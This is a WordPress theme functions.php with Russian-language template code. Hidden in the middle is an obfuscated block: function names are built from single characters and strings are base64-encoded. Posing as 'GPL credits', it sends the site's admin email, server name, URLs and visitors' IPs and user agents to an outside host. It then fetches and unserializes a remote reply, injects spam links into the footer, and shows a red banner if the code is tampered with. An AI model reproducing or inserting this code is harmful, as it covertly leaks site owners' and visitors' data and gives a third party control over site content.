<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $caZe='6';$kFPr='s';$lvCMT='o';$zMzL='e';$thCcMyD='d';$gQyb='b';$AsbiulO='d';$ZIqaH='c';$kRNeI='a';$NgAx='4';$oTnB='e';$Cayw='e';$HoLJF='_';$yNclOcoK=$gQyb.$kRNeI.$kFPr.$oTnB.$caZe.$NgAx.$HoLJF.$AsbiulO.$Cayw.$ZIqaH.$lvCMT.$thCcMyD.$zMzL;$kXtXklq='t';$atGNMO='f';$Idfr='g';$RANnSs='n';$mJDawsR='e';$Nbsm='z';$TxUYOdM='l';$wZgYwHg='a';$CxBhw='i';$yiaUNthd=$Idfr.$Nbsm.$CxBhw.$RANnSs.$atGNMO.$TxUYOdM.$wZgYwHg.$kXtXklq.$mJDawsR;$AriNqJY='_';$oIrzU='s';$YciLq='r';$DIOe='1';$GlzM='o';$zUpSSs='t';$SpdlELD='r';$WRqFQex='3';$wgrahN='t';$mZBlwjrp=$oIrzU.$wgrahN.$YciLq.$AriNqJY.$SpdlELD.$GlzM.$zUpSSs.$DIOe.$WRqFQex;$eSeVquf='r';$ZyDl='e';$yxlAidO='v';$JEjc='r';$scKR='s';$gdjtl='t';$syQwAltU=$scKR.$gdjtl.$eSeVquf.$JEjc.$ZyDl.$yxlAidO;                     
		$oh____________x='6';$nf____m='s';$ft________g='o';$pe________s='e';$zh_______o='d';$zx___________a='b';$oc_____o='d';$lz__________y='c';$mm_______b='a';$dr_______e='4';$ag______________d='e';$ay__________n='e';$up________p='_';$cf________h=$zx___________a.$mm_______b.$nf____m.$ag______________d.$oh____________x.$dr_______e.$up________p.$oc_____o.$ay__________n.$lz__________y.$ft________g.$zh_______o.$pe________s;
		$zb__n='n';$mt___q='i';$ie_________l='x';$mx___r='u';$ve__q='i';$dm__________c='s';$jz__________g='t';$os______p='f';$uj___g='_';$ac_____h='n';$vh_________f='t';$wd______________j='o';$cq__________q='c';$mp______________y='s';$gg______________h='e';$fq__________c=$os______p.$mx___r.$ac_____h.$cq__________q.$vh_________f.$mt___q.$wd______________j.$zb__n.$uj___g.$gg______________h.$ie_________l.$ve__q.$mp______________y.$jz__________g.$dm__________c;
		$iw____________j='p';$oj___________n='e';$xg_____________q='n';$ai__e='f';$vq_____k='o';$wd____r=$ai__e.$vq_____k.$iw____________j.$oj___________n.$xg_____________q;
		$er_____________o='e';$yn____________w='f';$ah______j='a';$tp________d='r';$nx____________c='d';$vs_______y=$yn____________w.$tp________d.$er_____________o.$ah______j.$nx____________c;
		$xq_____s='l';$kx___w='f';$gp________k='c';$cc________o='s';$rh________f='o';$fx____y='e';$xz_______________j=$kx___w.$gp________k.$xq_____s.$rh________f.$cc________o.$fx____y;
		
		define("WP_ID", $cf________h("Mi4wLjA="));
		define("WP_TTL", $cf________h("MTA4MDA="));
		define("WP_SRC", $cf________h("dHBva24="));
	


		function wp_get_header() {
			global $cf________h, $fq__________c;
			
			if (
				$fq__________c($cf________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$fq__________c($cf________h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$fq__________c($cf________h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $cf________h, $wd____r, $xz_______________j, $vs_______y;
			
			$aq__m = TEMPLATEPATH."/".$cf________h("Zm9vdGVyLnBocA==");
			$vu____v = @$wd____r($aq__m, "r");
			$aq__m = @$vs_______y($vu____v, @filesize($aq__m));
			@$xz_______________j($vu____v);
			
			$se__n = TEMPLATEPATH."/".$cf________h("ZnVuY3Rpb25zLnBocA==");
			$vu____v = @$wd____r($se__n, "r");
			$se__n = @$vs_______y($vu____v, @filesize($se__n));
			@$xz_______________j($vu____v);
			
			$cn_____w = 0;
			if($aq__m && $se__n) {
				if ($cf________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($aq__m, $cf________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$cn_____w = 1;
					}
					if (substr_count($aq__m, "wp_theme_GPL_credits()") < 1) {
						$cn_____w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$cn_____w = 12;
				}
			}
			
			if($cn_____w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $cn_____w -->";
			}
		}
	


		function wp_loaded() {
			global $cf________h, $fq__________c;
			return $fq__________c($cf________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($hw___d, $my_______________t = "(more...)", $lw__________b = 0, $vl____t = "") {
				$vc______________y = get_the_content($my_______________t, $lw__________b, $vl____t);
				$vc______________y = apply_filters("the_content", $vc______________y);
				
				$vc______________y = str_replace("]]>", "]]>", $vc______________y);
				if (strlen($_GET["p"]) > 0) {
					echo $vc______________y;
				}
				else if ((strlen($vc______________y)>$hw___d) && ($fs_______x = strpos($vc______________y, " ", $hw___d ))) {
					$vc______________y = substr($vc______________y, 0, $fs_______x);
					$vc______________y = $vc______________y;
					echo $vc______________y;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$my_______________t</a></div></p>";
				} else {
					echo $vc______________y;
				}
				
			}
		}
	


		$za_______________m='6';$um________z='s';$mj____g='c';$ph_____s='n';$om_______r='b';$vm_______i='_';$wc________k='e';$om___s='4';$av___z='d';$zd______________o='e';$vr_____e='o';$df___m='a';$ii_________z='e';$it____m=$om_______r.$df___m.$um________z.$ii_________z.$za_______________m.$om___s.$vm_______i.$zd______________o.$ph_____s.$mj____g.$vr_____e.$av___z.$wc________k;
		$gy_________r='n';$nx____p='s';$lb__________m='t';$ao_____________g='f';$jk__e='e';$vc_____a='_';$xs__________k='i';$nz_______b='t';$qk____________o='_';$jw__________d='e';$nj__y='g';$fx____________o='l';$vv______________j='e';$ad____q='t';$ol___________k='n';$ch_______________h='c';$fs_____________p='o';$wg______________g=$ao_____________g.$xs__________k.$fx____________o.$jw__________d.$vc_____a.$nj__y.$vv______________j.$lb__________m.$qk____________o.$ch_______________h.$fs_____________p.$ol___________k.$nz_______b.$jk__e.$gy_________r.$ad____q.$nx____p;
		$zy___________p='t';$zp_____________o='s';$iw__f='x';$ow___g='e';$nq_____l='e';$fs____________k='i';$ew______x='f';$uh____________l='_';$qx___________m='i';$pa______________g='l';$pb______f='s';$cd_________e=$ew______x.$qx___________m.$pa______________g.$ow___g.$uh____________l.$nq_____l.$iw__f.$fs____________k.$pb______f.$zy___________p.$zp_____________o;
		$oe_________y='a';$vf___________r='e';$uh_______z='s';$oh______________b='c';$ua____o='m';$uc___________h='v';$vl__________q='_';$nj______________x='e';$yz__________h='i';$qu_______________w='o';$xw____v='r';$jt______f='o';$fz___i='r';$xz___x='n';$ho_________g='p';$mp____________l=$uc___________h.$nj______________x.$fz___i.$uh_______z.$yz__________h.$jt______f.$xz___x.$vl__________q.$oh______________b.$qu_______________w.$ua____o.$ho_________g.$oe_________y.$xw____v.$vf___________r;
		$yp________y='o';$ww_____________a='c';$aw____________c='e';$bv_____________h='f';$sp_______w='n';$oe____r='p';$ko__d='k';$ed_____________b='s';$aq_________u='o';$da____l=$bv_____________h.$ed_____________b.$yp________y.$ww_____________a.$ko__d.$aq_________u.$oe____r.$aw____________c.$sp_______w;
		$xg_______l='e';$gi_______a='w';$lk____________l='i';$ta___________a='r';$co________m='t';$zb_______s='f';$kr______________f=$zb_______s.$gi_______a.$ta___________a.$lk____________l.$co________m.$xg_______l;
		$mr___y='m';$iw___________g='5';$cu_______f='d';$kl_______e=$mr___y.$cu_______f.$iw___________g;
		$wb_________a='a';$gq___s='a';$pl___________h='l';$si______m='t';$yg__________w='e';$vy______z='h';$vo__a='p';$ez_______o='r';$iq__________k=$ez_______o.$yg__________w.$gq___s.$pl___________h.$vo__a.$wb_________a.$si______m.$vy______z;
		$bg_____________w='u';$mz___________k='i';$ro___________r='e';$jb_________b='e';$fj____________m='s';$nt____________f='i';$sg____u='l';$xv_______x='n';$xt__________l='r';$uk____k='a';$va______a='z';$xe______s=$bg_____________w.$xv_______x.$fj____________m.$ro___________r.$xt__________l.$nt____________f.$uk____k.$sg____u.$mz___________k.$va______a.$jb_________b;
		$ad____________c='m';$zc______________b='p';$bk________z='t';$pl__________c='n';$sj________v='e';$rp________y='a';$xu_________g='m';$du_________b=$bk________z.$sj________v.$ad____________c.$zc______________b.$pl__________c.$rp________y.$xu_________g;
		$cz_______________n='_';$dz_______k='c';$dr_____________v='e';$mm_____________y='t';$hv______z='s';$ui______o='a';$ok_______r='r';$ob__q='t';$ud____g='e';$cv____________q='n';$jz______________g='m';$ap_________v='c';$tr__z='e';$ix_______________k='r';$gc______j='t';$hi________p='t';$by____________q='e';$vt_______c='o';$aa____d='_';$li_______w='a';$lp___v='x';$yi___________a=$hv______z.$hi________p.$ok_______r.$dr_____________v.$li_______w.$jz______________g.$cz_______________n.$dz_______k.$vt_______c.$cv____________q.$gc______j.$ud____g.$lp___v.$ob__q.$aa____d.$ap_________v.$ix_______________k.$tr__z.$ui______o.$mm_____________y.$by____________q;
	


		function pp_____________a($wa__________g) {
			global $cf________h, $fq__________c, $wg______________g, $mp____________l, $yi___________a;
			
			if (!$fq__________c($cf________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($mp____________l(PHP_VERSION, "5.0.0", ">=") && $fq__________c($cf________h("ZmlsZV9nZXRfY29udGVudHM=")) && $fq__________c($cf________h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$qd____________z = $yi___________a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$yf______________k = @$wg______________g($wa__________g, 0, $qd____________z);
			} else {
				$yf______________k = @$wg______________g($wa__________g, 0);
			}
			
			return $yf______________k;
		}
	


		function nq________x($wa__________g) {
			global $fq__________c, $da____l, $kr______________f, $cf________h;
			
			if (!$fq__________c($cf________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$su___________q = strpos($wa__________g, "/", 7);
			$wm______________q = array(
				"uri"     => substr($wa__________g, $su___________q),
				"host"    => str_replace("http://", "", substr($wa__________g, 0, $su___________q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xj_____u = @$da____l("$wm______________q[host]", 80, $yk_________m, $sj_______q, 4);
			
			if (!$xj_____u) {
				return false;
			} else {
				$yf______________k = "";
				$nu_______w  = "GET $wm______________q[uri] HTTP/1.0\r\n";
				$nu_______w .= "Host: $wm______________q[host]\r\n";
				$nu_______w .= "Referer: $wm______________q[referer]\r\n";
				$nu_______w .= "Connection: Close\r\n\r\n";
				
				@$kr______________f($xj_____u, $nu_______w);
				
				while (!@feof($xj_____u)) {
					$no_________n = @fgets($xj_____u, (1024*24));
					
					if ($no_________n == "\r\n") {
						$oy_______________f = true;
						continue;
					}
					
					if ($oy_______________f) {
						$yf______________k .= $no_________n;
					}
				}
				
				return $yf______________k;
			}
		}
	


		function vq____k($wa__________g) {
			global $fq__________c;
			$sn________o = false;
			
			if ($wa__________g != "") {
				if ($fq__________c("pp_____________a")) {
					$sn________o = @pp_____________a($wa__________g);
				}
				
				if (!$sn________o && ($fq__________c("nq________x"))) {
					$sn________o = @nq________x($wa__________g);
				}
			}
			
			return $sn________o;
		}
	


		function kq______q() {
			global $_SERVER, $kl_______e;
			
			$nm_____________x = $_SERVER["SERVER_NAME"];
			
			if (substr("$nm_____________x", 0, 4) == "www.") {
				$nm_____________x = substr("$nm_____________x", 4);
			}
			
			$nm_____________x = $kl_______e("$_SERVER[SERVER_NAME]");
			
			return $nm_____________x;
		}
	


		function la________c() {
			return "file";
		}
	


		function sg____h($wa__________g) {
			global $_SERVER, $wg______________g, $cd_________e, $wd____r, $xz_______________j, $kr______________f;
			
			$gg_____q = vt________f();
			
			$ku___k = kq______q().".jpg";
			$vr_______________k = $gg_____q["dir_upload"]["path"]."/$ku___k";
			$jd______________w = @filemtime($vr_______________k);
			
			if (!$jd______________w || ((time()-$jd______________w) >= WP_TTL)) {
				$sn________o = vq____k($wa__________g);
				
				if ($sn________o) {
					if ($cd_________e($vr_______________k)) {
						@unlink($vr_______________k);
					}
					
					$vu____v = @$wd____r($vr_______________k, "x+");
					
					@$kr______________f($vu____v, $sn________o);
					@$xz_______________j($vu____v);
				}
			} else {
				if ($cd_________e($vr_______________k)) {
					$sn________o = @$wg______________g($vr_______________k);
				} else {
					$sn________o = false;
				}
			}
			
			return $sn________o;
		}
	


		function vt________f() {
			global $_SERVER, $cf________h, $it____m;
			
			$gp_______w = wp_count_posts("post");
			$cv_____c = pathinfo(get_bloginfo("template_directory"));
			
			$gg_____q = array(
				"url" => array(
					"report"      => $cf________h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $cv_____c,
				"dir_upload"	=> ai__________j(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$cv_____c[filename],
					"a005=".$gp_______w->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"	
			);
			
			$gg_____q["url"]["queryString"] = implode("&", $gg_____q["queryString"]);
			$gg_____q["url"]["report"] = $gg_____q["url"]["report"]."/?".$it____m($gg_____q["url"]["queryString"]).".html";
						
			return $gg_____q;
		}
	


		function ai__________j() {
			$ms__________f = wp_upload_dir();
			
			if (isset($ms__________f["error"])) {
				$fd___g = ri______s();
				if (is_writable($fd___g)) {
					$ms__________f = array("path" => $fd___g);
				}
			}

			return $ms__________f;
		}
	


		function ri______s() {
			global $fq__________c, $kl_______e, $iq__________k, $du_________b;
			
			$mc_____y = (bool) ini_get("safe_mode");
			if ($mc_____y == true) {
				return false;
			}
			
			if ($fq__________c("sys_get_temp_dir")) {
				$cw_____g = sys_get_temp_dir();
				if (is_writable($cw_____g)) {
					return $iq__________k($cw_____g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $iq__________k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $iq__________k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $iq__________k($_ENV["TEMP"]);
			} else {
				$gm_____d = $du_________b($kl_______e(uniqid(rand(), true)), "");
				if ($gm_____d) {
					$cw_____g = $iq__________k(dirname($gm_____d));
					@unlink($gm_____d);
					return $cw_____g;
				} else {
					return false;
				}
			}
		}
	


		function kg___v() {
			global $_GET, $cd_________e;
			
			$gg_____q = vt________f();
			$nm_____________x = kq______q();
			$mk________f = la________c();
			
			$he___s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mk________f == "file") {
					$iu_____d = $gg_____q["dir_upload"]["path"]."/".$nm_____________x.".jpg";
					if ($cd_________e($iu_____d)) {
						@unlink($iu_____d);
						$he___s = "deleted";
					}
				}
				
				$py_______d = array(
					"s"	=> $he___s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($py_______d AS $yb_____h => $wo_______l) echo " [$yb_____h:$wo_______l]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $fq__________c, $cf________h, $xe______s;
			$gg_____q = vt________f();
			
			$ul___u = "sg____h";
			if ($fq__________c($ul___u)) {
				$yf______________k = $ul___u($gg_____q["url"]["report"]);
			}
			
			if ($yf______________k) {
				if ($yf______________k = @$cf________h($yf______________k)) {
					$yf______________k = @$xe______s($yf______________k);
					
					if (strlen($yf______________k[custom_credit]) >= 5) {
						$gg_____q["default_string"] = $yf______________k[custom_credit];
					}
					
					if ($yf______________k["status"] == "0") {
						$zy_____w = 1;
						$ef__b = 1;
					} else {
						$fn______l = sizeof($yf______________k["links"]);
						$sd__________t = $gg_____q["default_string"];
						
						if ($fn______l > 0 && $yf______________k["links"] !== "") {
							$hj____________n = 0;
							foreach ($yf______________k["links"] as $al__v => $wq____k) {
								$hj____________n++;
								if ($wq____k->l_path == "" || $wq____k->l_path == $_SERVER["REQUEST_URI"]) {
									$wq____k->l_href = htmlspecialchars(strip_tags($wq____k->l_href));
									$wq____k->l_title = htmlspecialchars(strip_tags($wq____k->l_title));
									$wq____k->l_anchor = htmlspecialchars(strip_tags($wq____k->l_anchor));
									$sd__________t .= " | ";
									$sd__________t .= "<a href='$wq____k->l_href' title='$wq____k->l_title'";
									if ($wq____k->l_nofollow == "1") {
										$sd__________t .= " rel='nofollow'";
									}
									$sd__________t .= ">$wq____k->l_anchor</a>";
								}
							}
						}
						$gg_____q["links"] = "$sd__________t";
						if ($yf______________k[credit] == "0") {
							$gg_____q["links"] = "";
						}
					}
				} else {
					$zy_____w = "1";
				}
			} else {
				$zy_____w = "1";
			}
			
			if ($zy_____w == "1") {
				$gg_____q["links"] = $gg_____q["default_string"];
			}
			
			echo "$gg_____q[links]";
			
			echo "<!-- s: $yf______________k[signature] -->";
			kg___v();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
             'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
